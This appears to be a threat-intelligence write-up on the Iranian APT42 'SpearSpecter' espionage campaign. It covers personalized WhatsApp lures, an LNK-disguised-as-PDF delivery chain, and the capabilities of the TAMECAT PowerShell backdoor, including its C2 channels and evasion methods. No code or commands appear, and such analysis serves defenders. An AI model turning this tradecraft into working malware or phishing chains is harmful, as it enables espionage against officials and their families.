TAMECAT Backdoor

A wave of espionage activity tied to the Iranian state-aligned group APT42 has surfaced, with analysts observing a focused effort against individuals and organizations linked to the interests of the Islamic Revolutionary Guard Corps (IRGC). Detected in early September 2025 and assigned the codename SpearSpecter, this operation demonstrates a sophisticated blend of social engineering and tailored malware deployment aimed at intelligence collection.

A Broadened Targeting Strategy

The operators behind this campaign have aimed directly at senior government and defense officials, using highly personalized approaches to pull them into engagement. Invitations to prominent conferences and offers of influential meetings are common lures. A defining characteristic of this activity is the widening of the victim pool to include family members, increasing pressure and expanding the attack surface around primary targets.

Origins and Evolution of APT42

APT42 entered public reporting in late 2022, shortly after researchers linked it to multiple IRGC-associated groups. These include well-known clusters such as APT35, Charming Kitten, ITG18, Mint Sandstorm, and TA453, among others. The group’s operational trademark is its ability to sustain long-running social engineering operations, sometimes lasting weeks, while impersonating trusted contacts to gain credibility before delivering harmful payloads or malicious links.

Earlier in June 2025, specialists uncovered another major campaign aimed at Israeli cybersecurity and technology professionals. In that case, the attackers posed as executives and researchers in both email and WhatsApp communications. Although related, the June activity and SpearSpecter stem from two different internal clusters of APT42—cluster B focused on credential theft, while cluster D centers on malware-driven intrusions.

Personalized Deception Tactics

At the core of SpearSpecter lies a flexible attack methodology shaped around the target’s value and the operators’ objectives. Some victims are redirected to counterfeit meeting portals engineered to harvest credentials. Others face a more intrusive approach that delivers a persistent PowerShell backdoor named TAMECAT, a tool repeatedly used by the group in recent years.

Common attack chains begin with impersonation on WhatsApp, where the adversary forwards a malicious link claiming to be a required document for an upcoming engagement. Clicking it triggers a redirect sequence that results in delivery of a WebDAV-hosted LNK file disguised as a PDF, leveraging the search-ms: protocol handler to deceive the victim.

The TAMECAT Backdoor: Modular, Persistent, and Adaptive

Once executed, the LNK file connects to an attacker-operated Cloudflare Workers subdomain to fetch a batch script that activates TAMECAT. This PowerShell-based framework uses modular components to support exfiltration, surveillance, and remote management. Its Command-and-Control (C2) channels span HTTPS, Discord, and Telegram, ensuring resiliency even when one avenue is shut down.

For Telegram-based operations, TAMECAT retrieves and executes PowerShell code relayed by a bot under the attackers’ control. Discord-based C2 makes use of a webhook that sends system details and receives commands from a predefined channel. Analysis suggests commands may be customized per infected host, enabling coordinated activity against multiple targets via a shared infrastructure.

Capabilities That Support Deep Espionage

TAMECAT offers a broad suite of intelligence-gathering features. Among them:

• Data Collection and Extraction
• Harvesting files with specified extensions
• Extracting data from Google Chrome, Microsoft Edge, and Outlook mailboxes
• Performing continuous screenshot capture every 15 seconds
• Exfiltrating collected information through HTTPS or FTP
• Stealth and Evasion Measures
• Encrypting telemetry and payloads
• Obfuscating PowerShell source code
• Using living-off-the-land binaries to blend malicious actions with normal system behavior
• Executing primarily in memory to minimize disk artifacts

A Resilient and Camouflaged Infrastructure

The infrastructure supporting SpearSpecter blends attacker-controlled systems with legitimate cloud services to obscure malicious activity. This hybrid approach allows seamless initial compromise, durable C2 communications, and covert data extraction. The operational design reflects a threat actor intent on long-term infiltration of high-value networks while maintaining minimal exposure.

Conclusion

The SpearSpecter campaign underscores APT42’s ongoing refinement of espionage operations, combining long-term social engineering, adaptive malware, and robust infrastructure to advance intelligence objectives. Its persistent and highly targeted nature places officials, defense personnel, and affiliated individuals at continued risk, reinforcing the need for heightened vigilance and strong security hygiene across all communication channels.